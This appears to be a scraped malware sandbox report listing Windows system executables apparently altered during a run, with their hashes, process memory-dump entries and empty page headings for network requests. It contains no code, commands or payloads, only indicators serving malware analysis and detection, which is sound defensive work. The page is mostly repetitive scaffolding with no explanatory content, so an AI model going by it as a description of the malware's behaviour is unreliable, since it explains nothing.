8d977edb7089e47239d0724ae9b8574720fb936a

SHA256
5f2919091b2cdf106474222d75c723d055b59362a08471b05e8e1b42dff7af07

SHA512
f9084d449fb88cf5fdba6808180ee3ae473a847eb8a443b1f45841bed1051b9b1a3e75a87cf977b947c71612d5d1f47a0e31c7ae3230217653e1e87fee3d56ec

Download Submit
\Windows\System32\msdtc.exe

Filesize
1.3MB

MD5
c6db4eb861b540129d4c24b73f6642e2

SHA1
f4c22e45c54cdb7bce4b53b81e422a0ca23a9a73

SHA256
bae427f2ced185082c1c2a2e0d7fb5dc69c1ee7576fd67168b164d9cce7693a8

SHA512
81da7a9f4e670abdbb4526077034741bbf1c0f3268fbb1313d4a4cfabbb297f33e59efeb308b407c384da8d963f512847a0b1bc338c127bd92357b6ca366cb72

Download Submit
\Windows\System32\msiexec.exe

Filesize
1.3MB

MD5
9dbd40a20ad1869da7cbcac49a637054

SHA1
ff9512801c49e2f591769b82294568251dd37dbe

SHA256
d16c7a3c970e4e22507b828822336cc9cdfe337468292f2aa06f47e87faddaa2

SHA512
11929910f1c370645a03fd079ce718a95ac0a1c82e2e919edf5d921e5f2f205c288c73c3ab356e3d5326fdba68bfeeea5f568c278b50741f14c8a7a31e2a771c

Download Submit
\Windows\System32\snmptrap.exe

Filesize
1.2MB

MD5
fd2d2b06d8317ef33c2ebe984f0d10c0

SHA1
8be9a73252cb4fee4242f61689a577cef307ebdd

SHA256
b5df09fa6fe510ee98325956f925d19e79c3e5ea416d086b34c44fd6fb83f581

SHA512
1ceab855357ff6281dbba0d6997c1d813d5634c5b51dd0ac34e35981f39f93a2a2e62c765af392f3ca95acae585cb92046917e036358e8e68fbcfbabde07a604

Download Submit
\Windows\System32\wbem\WmiApSrv.exe

Filesize
1.4MB

MD5
3b31c74b4a1fb0674e9f6fd05d9711f4

SHA1
ba263cdb79dbdbb4c1d6326fbf35943c97fed5a4

SHA256
0c4a9e788e57f30174a73958bbd474c32793e045fc7a78b46044c4f9967875f6

SHA512
f547c006d8e9c67f3c0c11547b55e691a556a4a25e2bf3ab3ca415080b729abfacb004a9168cf94a03a83fd850354b4ee83c013c1171242b4a3cfbfe9a11f56f

Download Submit
\Windows\ehome\ehrecvr.exe

Filesize
1.2MB

MD5
50bfc46dda84f1260ca4dc7da12990f4

SHA1
f201eab9e07cc97f6f727490d1a26a3ea7c6599b

SHA256
fe44c42b18dd06467ec5cc705aab1d601c95f82ff75c841184bbc61131a0c4ff

SHA512
36a0769fce18c850f829a08626c0bedec8c06cb5c92e650f4a105091ce39626458e0f62c974ebdbe6cd770ac45d13cf1ef657b43d2f8aa8eb08e91043f0c0e1c

Download Submit
\Windows\ehome\ehsched.exe

Filesize
1.3MB

MD5
0f451259988425f7663fe8ae60cf10c5

SHA1
d13e591527b604b4b615fcb1dad213f985f4af98

SHA256
b60814234cc69ffcadc8d965fb952277c25ab4f0cb926c7c61e0de7504ee8552

SHA512
b86bf89bc9131325b000e1b7b2e069f53e3c4b11bfa4c95a725688a84582520d95f413523b878c0a4e62da36232c795ead351e0254d591b4bd92dc4272e7951b

Download Submit
memory/868-872-0x0000000100000000-0x000000010020A000-memory.dmp

Filesize
2.0MB

Download
memory/868-420-0x0000000100000000-0x000000010020A000-memory.dmp

Filesize
2.0MB

Download
memory/896-158-0x0000000140000000-0x00000001401ED000-memory.dmp

Filesize
1.9MB

Download
memory/896-287-0x0000000140000000-0x00000001401ED000-memory.dmp

Filesize
1.9MB

Download
memory/896-808-0x0000000140000000-0x00000001401ED000-memory.dmp

Filesize
1.9MB

Download
memory/908-180-0x0000000140000000-0x0000000140209000-memory.dmp

Filesize
2.0MB

Download
memory/908-185-0x0000000140000000-0x0000000140209000-memory.dmp

Filesize
2.0MB

Download
memory/928-395-0x0000000100000000-0x00000001001D4000-memory.dmp

Filesize
1.8MB

Download
memory/928-274-0x0000000100000000-0x00000001001D4000-memory.dmp

Filesize
1.8MB

Download
memory/1040-385-0x0000000140000000-0x00000001401F1000-memory.dmp

Filesize
1.9MB

Download
memory/1040-131-0x0000000140000000-0x00000001401F1000-memory.dmp

Filesize
1.9MB

Download
memory/1040-262-0x0000000140000000-0x00000001401F1000-memory.dmp

Filesize
1.9MB

Download
memory/1140-263-0x0000000140000000-0x00000001401ED000-memory.dmp

Filesize
1.9MB

Download
memory/1140-303-0x0000000140000000-0x00000001401ED000-memory.dmp

Filesize
1.9MB

Download
memory/1324-456-0x0000000100000000-0x0000000100123000-memory.dmp

Filesize
1.1MB

Download
memory/1324-878-0x0000000100000000-0x0000000100123000-memory.dmp

Filesize
1.1MB

Download
memory/1364-397-0x0000000100000000-0x0000000100203000-memory.dmp

Filesize
2.0MB

Download
memory/1364-840-0x0000000100000000-0x0000000100203000-memory.dmp

Filesize
2.0MB

Download
memory/1368-435-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/1368-411-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/1500-245-0x0000000001000000-0x00000000011D5000-memory.dmp

Filesize
1.8MB

Download
memory/1500-353-0x0000000001000000-0x00000000011D5000-memory.dmp

Filesize
1.8MB

Download
memory/1580-298-0x0000000100000000-0x00000001001D5000-memory.dmp

Filesize
1.8MB

Download
memory/1580-413-0x0000000100000000-0x00000001001D5000-memory.dmp

Filesize
1.8MB

Download
memory/1612-289-0x000000002E000000-0x000000002FE1E000-memory.dmp

Filesize
30.1MB

Download
memory/1612-169-0x000000002E000000-0x000000002FE1E000-memory.dmp

Filesize
30.1MB

Download
memory/1888-309-0x0000000140000000-0x00000001401ED000-memory.dmp

Filesize
1.9MB

Download
memory/1888-291-0x0000000140000000-0x00000001401ED000-memory.dmp

Filesize
1.9MB

Download
memory/2104-663-0x0000000003D90000-0x0000000003E4A000-memory.dmp

Filesize
744KB

Download
memory/2140-1045-0x0000000001C00000-0x0000000001C18000-memory.dmp

Filesize
96KB

Download
memory/2140-1046-0x000000001ADE0000-0x000000001ADEE000-memory.dmp

Filesize
56KB

Download
memory/2140-1050-0x000000001B350000-0x000000001B36E000-memory.dmp

Filesize
120KB

Download
memory/2140-1055-0x000000001B6B0000-0x000000001B6C8000-memory.dmp

Filesize
96KB

Download
memory/2140-1056-0x000000001B6B0000-0x000000001B6C8000-memory.dmp

Filesize
96KB

Download
memory/2140-1047-0x000000001ADF0000-0x000000001AE06000-memory.dmp

Filesize
88KB

Download
memory/2140-1049-0x000000001AE60000-0x000000001AE7A000-memory.dmp

Filesize
104KB

Download
memory/2140-1048-0x000000001AE10000-0x000000001AE58000-memory.dmp

Filesize
288KB

Download
memory/2180-11-0x0000000002B20000-0x0000000002B21000-memory.dmp

Filesize
4KB

Download
memory/2180-55-0x0000000000400000-0x000000000085A000-memory.dmp

Filesize
4.4MB

Download
memory/2180-0-0x0000000002090000-0x00000000020F7000-memory.dmp

Filesize
412KB

Download
memory/2180-7-0x0000000000400000-0x000000000085A000-memory.dmp

Filesize
4.4MB

Download
memory/2180-8-0x0000000002090000-0x00000000020F7000-memory.dmp

Filesize
412KB

Download
memory/2188-111-0x0000000140000000-0x000000014013C000-memory.dmp

Filesize
1.2MB

Download
memory/2188-244-0x0000000140000000-0x000000014013C000-memory.dmp

Filesize
1.2MB

Download
memory/2188-112-0x0000000000860000-0x00000000008C0000-memory.dmp

Filesize
384KB

Download
memory/2188-904-0x0000000140000000-0x000000014013C000-memory.dmp

Filesize
1.2MB

Download
memory/2188-118-0x0000000000860000-0x00000000008C0000-memory.dmp

Filesize
384KB

Download
memory/2260-324-0x000000002E000000-0x000000002E1F4000-memory.dmp

Filesize
2.0MB

Download
memory/2260-233-0x000000002E000000-0x000000002E1F4000-memory.dmp

Filesize
2.0MB

Download
memory/2328-991-0x0000000001900000-0x000000000190E000-memory.dmp

Filesize
56KB

Download
memory/2328-994-0x000000001AD10000-0x000000001AD26000-memory.dmp

Filesize
88KB

Download
memory/2328-993-0x000000001ACC0000-0x000000001AD08000-memory.dmp

Filesize
288KB

Download
memory/2328-992-0x0000000001910000-0x000000000191C000-memory.dmp

Filesize
48KB

Download
memory/2348-56-0x00000000005D0000-0x0000000000630000-memory.dmp

Filesize
384KB

Download
memory/2348-62-0x00000000005D0000-0x0000000000630000-memory.dmp

Filesize
384KB

Download
memory/2348-64-0x0000000010000000-0x00000000101E6000-memory.dmp

Filesize
1.9MB

Download
memory/2348-87-0x0000000010000000-0x00000000101E6000-memory.dmp

Filesize
1.9MB

Download
memory/2404-335-0x0000000100000000-0x0000000100219000-memory.dmp

Filesize
2.1MB

Download
memory/2404-779-0x0000000100000000-0x0000000100219000-memory.dmp

Filesize
2.1MB

Download
memory/2432-454-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/2432-468-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/2464-1006-0x000000001AA50000-0x000000001AA5E000-memory.dmp

Filesize
56KB

Download
memory/2464-1011-0x000000001AED0000-0x000000001AEDE000-memory.dmp

Filesize
56KB

Download
memory/2464-1012-0x000000001AED0000-0x000000001AEDE000-memory.dmp

Filesize
56KB

Download
memory/2464-1007-0x000000001ADB0000-0x000000001ADBC000-memory.dmp

Filesize
48KB

Download
memory/2464-1009-0x000000001AE10000-0x000000001AE26000-memory.dmp

Filesize
88KB

Download
memory/2464-1008-0x000000001ADC0000-0x000000001AE08000-memory.dmp

Filesize
288KB

Download
memory/2504-352-0x0000000100000000-0x0000000100542000-memory.dmp

Filesize
5.3MB

Download
memory/2504-239-0x0000000100000000-0x0000000100542000-memory.dmp

Filesize
5.3MB

Download
memory/2580-22-0x0000000100000000-0x00000001001E3000-memory.dmp

Filesize
1.9MB

Download
memory/2580-23-0x0000000000270000-0x00000000002D0000-memory.dmp

Filesize
384KB

Download
memory/2580-14-0x0000000000270000-0x00000000002D0000-memory.dmp

Filesize
384KB

Download
memory/2580-110-0x0000000100000000-0x00000001001E3000-memory.dmp

Filesize
1.9MB

Download
memory/2600-39-0x0000000010000000-0x00000000101DE000-memory.dmp

Filesize
1.9MB

Download
memory/2600-45-0x0000000000410000-0x0000000000477000-memory.dmp

Filesize
412KB

Download
memory/2600-71-0x0000000010000000-0x00000000101DE000-memory.dmp

Filesize
1.9MB

Download
memory/2600-40-0x0000000000410000-0x0000000000477000-memory.dmp

Filesize
412KB

Download
memory/2632-370-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/2632-354-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/2640-35-0x00000000007F0000-0x0000000000850000-memory.dmp

Filesize
384KB

Download
memory/2640-28-0x0000000140000000-0x00000001401DC000-memory.dmp

Filesize
1.9MB

Download
memory/2640-149-0x0000000140000000-0x00000001401DC000-memory.dmp

Filesize
1.9MB

Download
memory/2640-29-0x00000000007F0000-0x0000000000850000-memory.dmp

Filesize
384KB

Download
memory/2692-1032-0x0000000001980000-0x000000000199A000-memory.dmp

Filesize
104KB

Download
memory/2692-1033-0x00000000019A0000-0x00000000019BE000-memory.dmp

Filesize
120KB

Download
memory/2692-1031-0x0000000000E90000-0x0000000000E9E000-memory.dmp

Filesize
56KB

Download
memory/2692-1030-0x0000000000E40000-0x0000000000E58000-memory.dmp

Filesize
96KB

Download
memory/2708-93-0x00000000004F0000-0x0000000000550000-memory.dmp

Filesize
384KB

Download
memory/2708-101-0x0000000140000000-0x00000001401ED000-memory.dmp

Filesize
1.9MB

Download
memory/2708-99-0x00000000004F0000-0x0000000000550000-memory.dmp

Filesize
384KB

Download
memory/2708-235-0x0000000140000000-0x00000001401ED000-memory.dmp

Filesize
1.9MB

Download
memory/2784-815-0x0000000100000000-0x0000000100202000-memory.dmp

Filesize
2.0MB

Download
memory/2784-381-0x0000000100000000-0x0000000100202000-memory.dmp

Filesize
2.0MB

Download
memory/2808-222-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/2808-83-0x0000000000230000-0x0000000000297000-memory.dmp

Filesize
412KB

Download
memory/2808-78-0x0000000000230000-0x0000000000297000-memory.dmp

Filesize
412KB

Download
memory/2808-77-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/2876-407-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/2876-380-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/2936-145-0x0000000140000000-0x0000000140237000-memory.dmp

Filesize
2.2MB

Download
memory/2936-267-0x0000000140000000-0x0000000140237000-memory.dmp

Filesize
2.2MB

Download
memory/2992-455-0x0000000100000000-0x0000000100253000-memory.dmp

Filesize
2.3MB

Download
memory/2992-313-0x0000000100000000-0x0000000100253000-memory.dmp

Filesize
2.3MB

Download
memory/3000-358-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/3000-325-0x0000000000400000-0x00000000005E7000-memory.dmp

Filesize
1.9MB

Download
memory/3008-210-0x0000000140000000-0x00000001401F5000-memory.dmp

Filesize
2.0MB

Download
memory/3028-211-0x0000000000690000-0x0000000000881000-memory.dmp

Filesize
1.9MB

Download
memory/3028-311-0x0000000000690000-0x0000000000881000-memory.dmp

Filesize
1.9MB

Download
memory/3028-312-0x0000000100000000-0x00000001001F1000-memory.dmp

Filesize
1.9MB

Download
memory/3028-220-0x0000000100000000-0x00000001001F1000-memory.dmp

Filesize
1.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request